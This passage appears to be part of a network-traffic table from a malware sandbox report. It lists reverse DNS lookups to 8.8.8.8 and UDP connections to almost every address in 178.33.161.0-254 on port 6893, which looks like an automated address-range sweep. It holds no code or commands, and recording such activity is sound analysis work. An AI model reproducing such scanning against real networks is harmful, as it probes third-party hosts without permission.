| US | 8.8.8.8:53 | 138.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.160.33.178.in-addr.arpa | udp |
| FR | 178.33.160.255:6893 | udp | |
| FR | 178.33.161.0:6893 | udp | |
| FR | 178.33.161.1:6893 | udp | |
| FR | 178.33.161.2:6893 | udp | |
| FR | 178.33.161.3:6893 | udp | |
| FR | 178.33.161.4:6893 | udp | |
| FR | 178.33.161.5:6893 | udp | |
| US | 8.8.8.8:53 | 203.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.6:6893 | udp | |
| FR | 178.33.161.7:6893 | udp | |
| FR | 178.33.161.8:6893 | udp | |
| FR | 178.33.161.9:6893 | udp | |
| FR | 178.33.161.10:6893 | udp | |
| FR | 178.33.161.11:6893 | udp | |
| FR | 178.33.161.12:6893 | udp | |
| FR | 178.33.161.13:6893 | udp | |
| US | 8.8.8.8:53 | 204.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.14:6893 | udp | |
| FR | 178.33.161.15:6893 | udp | |
| FR | 178.33.161.16:6893 | udp | |
| FR | 178.33.161.17:6893 | udp | |
| FR | 178.33.161.18:6893 | udp | |
| FR | 178.33.161.19:6893 | udp | |
| FR | 178.33.161.20:6893 | udp | |
| US | 8.8.8.8:53 | 205.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.21:6893 | udp | |
| FR | 178.33.161.22:6893 | udp | |
| FR | 178.33.161.23:6893 | udp | |
| FR | 178.33.161.24:6893 | udp | |
| FR | 178.33.161.25:6893 | udp | |
| FR | 178.33.161.26:6893 | udp | |
| FR | 178.33.161.27:6893 | udp | |
| US | 8.8.8.8:53 | 206.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.28:6893 | udp | |
| FR | 178.33.161.29:6893 | udp | |
| FR | 178.33.161.30:6893 | udp | |
| FR | 178.33.161.31:6893 | udp | |
| FR | 178.33.161.32:6893 | udp | |
| FR | 178.33.161.33:6893 | udp | |
| FR | 178.33.161.34:6893 | udp | |
| FR | 178.33.161.35:6893 | udp | |
| FR | 178.33.161.36:6893 | udp | |
| FR | 178.33.161.37:6893 | udp | |
| FR | 178.33.161.38:6893 | udp | |
| FR | 178.33.161.39:6893 | udp | |
| FR | 178.33.161.40:6893 | udp | |
| FR | 178.33.161.41:6893 | udp | |
| US | 8.8.8.8:53 | 207.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.42:6893 | udp | |
| FR | 178.33.161.43:6893 | udp | |
| FR | 178.33.161.44:6893 | udp | |
| FR | 178.33.161.45:6893 | udp | |
| FR | 178.33.161.46:6893 | udp | |
| FR | 178.33.161.47:6893 | udp | |
| FR | 178.33.161.48:6893 | udp | |
| FR | 178.33.161.49:6893 | udp | |
| FR | 178.33.161.50:6893 | udp | |
| FR | 178.33.161.51:6893 | udp | |
| US | 8.8.8.8:53 | 208.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.52:6893 | udp | |
| FR | 178.33.161.53:6893 | udp | |
| FR | 178.33.161.54:6893 | udp | |
| FR | 178.33.161.55:6893 | udp | |
| FR | 178.33.161.56:6893 | udp | |
| FR | 178.33.161.57:6893 | udp | |
| FR | 178.33.161.58:6893 | udp | |
| FR | 178.33.161.59:6893 | udp | |
| FR | 178.33.161.60:6893 | udp | |
| FR | 178.33.161.61:6893 | udp | |
| US | 8.8.8.8:53 | 209.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.62:6893 | udp | |
| FR | 178.33.161.63:6893 | udp | |
| FR | 178.33.161.64:6893 | udp | |
| FR | 178.33.161.65:6893 | udp | |
| FR | 178.33.161.66:6893 | udp | |
| FR | 178.33.161.67:6893 | udp | |
| FR | 178.33.161.68:6893 | udp | |
| FR | 178.33.161.69:6893 | udp | |
| FR | 178.33.161.70:6893 | udp | |
| FR | 178.33.161.71:6893 | udp | |
| FR | 178.33.161.72:6893 | udp | |
| FR | 178.33.161.73:6893 | udp | |
| FR | 178.33.161.74:6893 | udp | |
| FR | 178.33.161.75:6893 | udp | |
| FR | 178.33.161.76:6893 | udp | |
| FR | 178.33.161.77:6893 | udp | |
| FR | 178.33.161.78:6893 | udp | |
| FR | 178.33.161.79:6893 | udp | |
| FR | 178.33.161.80:6893 | udp | |
| US | 8.8.8.8:53 | 210.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.81:6893 | udp | |
| FR | 178.33.161.82:6893 | udp | |
| FR | 178.33.161.83:6893 | udp | |
| FR | 178.33.161.84:6893 | udp | |
| FR | 178.33.161.85:6893 | udp | |
| FR | 178.33.161.86:6893 | udp | |
| FR | 178.33.161.87:6893 | udp | |
| FR | 178.33.161.88:6893 | udp | |
| FR | 178.33.161.89:6893 | udp | |
| FR | 178.33.161.90:6893 | udp | |
| US | 8.8.8.8:53 | 211.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.91:6893 | udp | |
| FR | 178.33.161.92:6893 | udp | |
| FR | 178.33.161.93:6893 | udp | |
| FR | 178.33.161.94:6893 | udp | |
| FR | 178.33.161.95:6893 | udp | |
| FR | 178.33.161.96:6893 | udp | |
| FR | 178.33.161.97:6893 | udp | |
| US | 8.8.8.8:53 | 212.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.98:6893 | udp | |
| FR | 178.33.161.99:6893 | udp | |
| FR | 178.33.161.100:6893 | udp | |
| FR | 178.33.161.101:6893 | udp | |
| FR | 178.33.161.102:6893 | udp | |
| FR | 178.33.161.103:6893 | udp | |
| FR | 178.33.161.104:6893 | udp | |
| FR | 178.33.161.105:6893 | udp | |
| FR | 178.33.161.106:6893 | udp | |
| FR | 178.33.161.107:6893 | udp | |
| FR | 178.33.161.108:6893 | udp | |
| FR | 178.33.161.109:6893 | udp | |
| FR | 178.33.161.110:6893 | udp | |
| FR | 178.33.161.111:6893 | udp | |
| FR | 178.33.161.112:6893 | udp | |
| FR | 178.33.161.113:6893 | udp | |
| FR | 178.33.161.114:6893 | udp | |
| FR | 178.33.161.115:6893 | udp | |
| FR | 178.33.161.116:6893 | udp | |
| FR | 178.33.161.117:6893 | udp | |
| FR | 178.33.161.118:6893 | udp | |
| FR | 178.33.161.119:6893 | udp | |
| FR | 178.33.161.120:6893 | udp | |
| FR | 178.33.161.121:6893 | udp | |
| FR | 178.33.161.122:6893 | udp | |
| FR | 178.33.161.123:6893 | udp | |
| FR | 178.33.161.124:6893 | udp | |
| FR | 178.33.161.125:6893 | udp | |
| FR | 178.33.161.126:6893 | udp | |
| FR | 178.33.161.127:6893 | udp | |
| US | 8.8.8.8:53 | 213.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.128:6893 | udp | |
| FR | 178.33.161.129:6893 | udp | |
| FR | 178.33.161.130:6893 | udp | |
| FR | 178.33.161.131:6893 | udp | |
| FR | 178.33.161.132:6893 | udp | |
| FR | 178.33.161.133:6893 | udp | |
| FR | 178.33.161.134:6893 | udp | |
| FR | 178.33.161.135:6893 | udp | |
| FR | 178.33.161.136:6893 | udp | |
| FR | 178.33.161.137:6893 | udp | |
| FR | 178.33.161.138:6893 | udp | |
| FR | 178.33.161.139:6893 | udp | |
| FR | 178.33.161.140:6893 | udp | |
| FR | 178.33.161.141:6893 | udp | |
| FR | 178.33.161.142:6893 | udp | |
| FR | 178.33.161.143:6893 | udp | |
| FR | 178.33.161.144:6893 | udp | |
| FR | 178.33.161.145:6893 | udp | |
| FR | 178.33.161.146:6893 | udp | |
| FR | 178.33.161.147:6893 | udp | |
| FR | 178.33.161.148:6893 | udp | |
| FR | 178.33.161.149:6893 | udp | |
| FR | 178.33.161.150:6893 | udp | |
| FR | 178.33.161.151:6893 | udp | |
| FR | 178.33.161.152:6893 | udp | |
| FR | 178.33.161.153:6893 | udp | |
| FR | 178.33.161.154:6893 | udp | |
| FR | 178.33.161.155:6893 | udp | |
| FR | 178.33.161.156:6893 | udp | |
| FR | 178.33.161.157:6893 | udp | |
| US | 8.8.8.8:53 | 214.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.158:6893 | udp | |
| FR | 178.33.161.159:6893 | udp | |
| FR | 178.33.161.160:6893 | udp | |
| FR | 178.33.161.161:6893 | udp | |
| FR | 178.33.161.162:6893 | udp | |
| FR | 178.33.161.163:6893 | udp | |
| FR | 178.33.161.164:6893 | udp | |
| FR | 178.33.161.165:6893 | udp | |
| FR | 178.33.161.166:6893 | udp | |
| FR | 178.33.161.167:6893 | udp | |
| US | 8.8.8.8:53 | 215.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.168:6893 | udp | |
| FR | 178.33.161.169:6893 | udp | |
| FR | 178.33.161.170:6893 | udp | |
| FR | 178.33.161.171:6893 | udp | |
| FR | 178.33.161.172:6893 | udp | |
| FR | 178.33.161.173:6893 | udp | |
| FR | 178.33.161.174:6893 | udp | |
| FR | 178.33.161.175:6893 | udp | |
| FR | 178.33.161.176:6893 | udp | |
| FR | 178.33.161.177:6893 | udp | |
| FR | 178.33.161.178:6893 | udp | |
| FR | 178.33.161.179:6893 | udp | |
| FR | 178.33.161.180:6893 | udp | |
| US | 8.8.8.8:53 | 216.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.181:6893 | udp | |
| US | 8.8.8.8:53 | 222.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.182:6893 | udp | |
| FR | 178.33.161.183:6893 | udp | |
| FR | 178.33.161.184:6893 | udp | |
| FR | 178.33.161.185:6893 | udp | |
| FR | 178.33.161.186:6893 | udp | |
| FR | 178.33.161.187:6893 | udp | |
| FR | 178.33.161.188:6893 | udp | |
| FR | 178.33.161.189:6893 | udp | |
| FR | 178.33.161.190:6893 | udp | |
| FR | 178.33.161.191:6893 | udp | |
| US | 8.8.8.8:53 | 223.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.192:6893 | udp | |
| FR | 178.33.161.193:6893 | udp | |
| FR | 178.33.161.194:6893 | udp | |
| FR | 178.33.161.195:6893 | udp | |
| FR | 178.33.161.196:6893 | udp | |
| FR | 178.33.161.197:6893 | udp | |
| FR | 178.33.161.198:6893 | udp | |
| FR | 178.33.161.199:6893 | udp | |
| FR | 178.33.161.200:6893 | udp | |
| FR | 178.33.161.201:6893 | udp | |
| FR | 178.33.161.202:6893 | udp | |
| FR | 178.33.161.203:6893 | udp | |
| FR | 178.33.161.204:6893 | udp | |
| FR | 178.33.161.205:6893 | udp | |
| FR | 178.33.161.206:6893 | udp | |
| FR | 178.33.161.207:6893 | udp | |
| FR | 178.33.161.208:6893 | udp | |
| FR | 178.33.161.209:6893 | udp | |
| FR | 178.33.161.210:6893 | udp | |
| FR | 178.33.161.211:6893 | udp | |
| FR | 178.33.161.212:6893 | udp | |
| FR | 178.33.161.213:6893 | udp | |
| FR | 178.33.161.214:6893 | udp | |
| FR | 178.33.161.215:6893 | udp | |
| FR | 178.33.161.216:6893 | udp | |
| FR | 178.33.161.217:6893 | udp | |
| FR | 178.33.161.218:6893 | udp | |
| FR | 178.33.161.219:6893 | udp | |
| FR | 178.33.161.220:6893 | udp | |
| FR | 178.33.161.221:6893 | udp | |
| FR | 178.33.161.222:6893 | udp | |
| FR | 178.33.161.223:6893 | udp | |
| FR | 178.33.161.224:6893 | udp | |
| FR | 178.33.161.225:6893 | udp | |
| US | 8.8.8.8:53 | 224.160.33.178.in-addr.arpa | udp |
| FR | 178.33.161.226:6893 | udp | |
| FR | 178.33.161.227:6893 | udp | |
| FR | 178.33.161.228:6893 | udp | |
| FR | 178.33.161.229:6893 | udp | |
| FR | 178.33.161.230:6893 | udp | |
| FR | 178.33.161.231:6893 | udp | |
| FR | 178.33.161.232:6893 | udp | |
| FR | 178.33.161.233:6893 | udp | |
| FR | 178.33.161.234:6893 | udp | |
| FR | 178.33.161.235:6893 | udp | |
| FR | 178.33.161.236:6893 | udp | |
| FR | 178.33.161.237:6893 | udp | |
| FR | 178.33.161.238:6893 | udp | |
| FR | 178.33.161.239:6893 | udp | |
| FR | 178.33.161.240:6893 | udp | |
| FR | 178.33.161.241:6893 | udp | |
| FR | 178.33.161.242:6893 | udp | |
| FR | 178.33.161.243:6893 | udp | |
| FR | 178.33.161.244:6893 | udp | |
| FR | 178.33.161.245:6893 | udp | |
| FR | 178.33.161.246:6893 | udp | |
| FR | 178.33.161.247:6893 | udp | |
| FR | 178.33.161.248:6893 | udp | |
| FR | 178.33.161.249:6893 | udp | |
| FR | 178.33.161.250:6893 | udp | |
| FR | 178.33.161.251:6893 | udp | |
| FR | 178.33.161.252:6893 | udp | |
| FR | 178.33.161.253:6893 | udp | |
| FR | 178.33.161.254:6893 | udp | |
| US | 8.8.8.8:53 | 225.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.161.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.161.33.178.in-addr.arpa | udp |
